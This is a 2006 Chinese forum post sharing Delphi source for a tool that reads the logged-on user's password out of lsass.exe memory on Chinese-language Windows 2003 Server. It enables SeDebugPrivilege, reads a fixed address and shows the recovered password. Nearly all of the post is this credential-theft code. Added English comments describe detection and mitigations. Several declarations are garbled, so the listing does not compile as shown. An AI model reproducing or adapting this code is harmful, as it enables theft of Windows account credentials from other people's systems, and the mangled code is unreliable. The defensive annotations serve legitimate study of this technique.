2006-05-31, 08:30 AM | #1 |
軟體 - Win2003 Server密碼讀取器1.0 [Delphi代碼]
Win2003 Server密碼讀取器1.0 [Delphi代碼]
什麼都不說了~既然有人認為我是轉載別人代碼改名字就說是自己寫的代碼 我也不在乎了...接著丟LJ~~ CODE:
{
  Windows 2003 Server [Chinese] password reader V1.0
  By Anskya
  Email:Anskya@Email.com
  Web:www.Anskya.Net
  Thanks: WinEggDrop for providing the C source code...
  Thanks also to the many friends for their support and help
  Thanks: the Firefox Technology Alliance (火狐技術聯盟) for its support www.Wrsky.com
}
// Review notes (defender's reading of this listing):
// - What it is: a console-less Win32 program that enables SeDebugPrivilege,
//   opens lsass.exe with PROCESS_VM_READ, reads 5120 bytes from one fixed
//   address and extracts the text that follows two byte signatures. This is
//   the LSASS-memory form of credential access (MITRE ATT&CK T1003.001).
// - Scope: the address and signatures are hard-coded, and the header names
//   the Chinese edition of Windows 2003 Server, so the lookup is specific to
//   that build; Windows Server 2003 is long out of vendor support.
// - Precondition: AdjustTokenPrivileges can only enable a privilege the token
//   already holds, so the caller needs an account granted "Debug programs"
//   (Administrators by default). Restricting that user right removes the
//   precondition.
// - Detection: the observable sequence is SeDebugPrivilege being enabled and
//   then a handle to lsass.exe requested with PROCESS_VM_READ (0x0010). On
//   current Windows versions that is what process-access telemetry (for
//   example Sysmon Event ID 10 with lsass.exe as the target image) surfaces.
// - Mitigation on current systems: LSA protection (RunAsPPL) and Credential
//   Guard are the controls aimed at this class of memory read.
// - Several declarations on this page lost characters in the forum rendering
//   (for example ")WORD;" and "PIDWORD"), so the listing does not compile as
//   shown; the code below is left exactly as extracted.
program GetWin2003Pass;

uses Windows,TlHelp32;

const
  BaseAddress = $002b5000; // fixed address inside lsass.exe that the read starts from
  TZM1:String = 'Remote Procedure Call (RPC)'; // first signature searched for in the buffer
  TZM2:String = #02#0#0#0#0#0#0; // second signature, searched for after the first

// Shows Msgs in a message box with no owner window and no caption.
procedure MsgBox(Msgs:String);
begin
  MessageBox(0,Pchar(Msgs),nil,0);
end;

// Raises the current process's access rights by enabling SeDebugPrivilege on
// its own token. The results of LookupPrivilegeValue and
// AdjustTokenPrivileges are not checked, so the caller is not told whether
// the privilege was actually enabled.
procedure GetDebugPrivs;
var
  hToken: THandle;
  tkp: TTokenPrivileges;
  retval: dword;
begin
  If (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken)) then
  begin
    LookupPrivilegeValue(nil,'SeDebugPrivilege', tkp.Privileges[0].Luid);
    tkp.PrivilegeCount := 1;
    tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
  end;
end;

// Returns True when GetVersionEx reports version 5.2, which this program
// treats as Windows 2003; False otherwise or when the call fails.
function Is2003:Boolean;
var
  osVerInfo: TOSVersionInfo;
begin
  Result:=False;
  ZeroMemory(@osVerInfo,sizeof(osVerInfo));
  osVerInfo.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  if GetVersionEx(osVerInfo) then
  begin
    if (osVerInfo.dwMajorVersion=5)and(osVerInfo.dwMinorVersion=2) then Result:=True;
  end;
end;

// Walks a Toolhelp snapshot and returns the process ID whose executable name
// equals Process (case-insensitive compare), or 0 when none matches. The loop
// does not stop at the first match, so the last matching entry wins.
function GetProcessPID(Process:Pchar)WORD;
var
  Process32: TProcessEntry32;
  ProcessSnapshot: THandle;
begin
  Result:=0;
  ProcessSnapshot := CreateToolHelp32SnapShot(TH32CS_SNAPALL, 0);
  Process32.dwSize := SizeOf(TProcessEntry32);
  Process32First(ProcessSnapshot, Process32);
  repeat
    if lstrcmpi(Process,Process32.szExeFile) = 0 then Result:=Process32.th32ProcessID;
  until not (Process32Next(ProcessSnapshot, Process32));
  CloseHandle(ProcessSnapshot);
end;

// Looks for the password in the memory of the process identified by PID.
// Reads 5120 bytes at BaseAddress, locates TZM1 and then TZM2 in that buffer,
// and collects the bytes after TZM2 up to the first #$80, leaving out #$00
// bytes. Each failure path reports through MsgBox and leaves the result as
// it was. The process handle is opened with PROCESS_VM_READ only.
function FindPassword(PIDWORD):String;
var
  Buffer:string;
  RetWORD;
  I,iPos:Integer;
  ProcessHandleWORD;
begin
  if PID =0 then Exit;
  GetDebugPrivs; // enable SeDebugPrivilege before asking for the handle
  ProcessHandle:=OpenProcess(PROCESS_VM_READ,FALSE,PID);
  if ProcessHandle > 0 then
  begin
    SetLength(Buffer, 5120);
    if ReadProcessMemory(ProcessHandle,Pointer(BaseAddress),Pchar(Buffer),5120,Ret) then
    begin
      iPos := Pos(TZM1, Buffer);
      if iPos > 0 then
      begin
        // Drop everything before the first signature, then search for the second.
        Buffer:=Copy(Buffer,iPos,Length(Buffer));
        iPos:=Pos(TZM2, Buffer);
        if iPos>0 then
        begin
          // Continue from the byte right after the second signature.
          iPos:=iPos+Length(TZM2);
          Buffer:=Copy(Buffer,iPos,Length(Buffer));
          for I:= 0 to Length(Buffer) do
          begin
            if Buffer[i] = #$80 then break; // #$80 is treated as the end marker
            // Zero bytes are skipped; presumably the stored text is
            // two-byte-per-character with ASCII content - TODO confirm.
            if Buffer[i] <> #$00 then Result:=Result+Buffer[i];
          end;
          Result:=Pchar(Result);
        end else MsgBox('掃瞄第二次特徵碼失敗');
      end else MsgBox('掃瞄第一次特徵碼失敗');
    end else MsgBox('Lsass.exe工作行程讀取失敗');
  end else MsgBox('打開工作行程Lsass.exe失敗');
end;

// Program flow: check the OS version, find Lsass.exe, run FindPassword on it,
// then show the current user name together with the recovered text in a
// message box. Every failed step ends in its own MsgBox message.
procedure WinMain;
var
  PIDWORD;
  Password,StrTemp:String;
  UserName:Array[0..MAX_PATH] of char;
  UserLenWORD;
begin
  if Is2003 then
  begin
    PID:=(GetProcessPID('Lsass.exe'));
    if PID>0 then
    begin
      Password:=FindPassword(PID);
      if Password <> '' then
      begin
        if GetUserName(UserName,UserLen) then
        begin
          StrTemp:='當前用戶名:'+UserName+#10#13+'當前密碼:'+Password;
          MessageBox(0,Pchar(StrTemp),'Win2003 密碼讀取器 V1.0 By Anskya',0);
        end else MsgBox('獲取用戶名失敗');
      end else MsgBox('獲取密碼失敗');
    end else MsgBox('查找Lsass.exe失敗');
  end else MsgBox('此系統不是Win2003');
end;

begin
  WinMain;
end.
|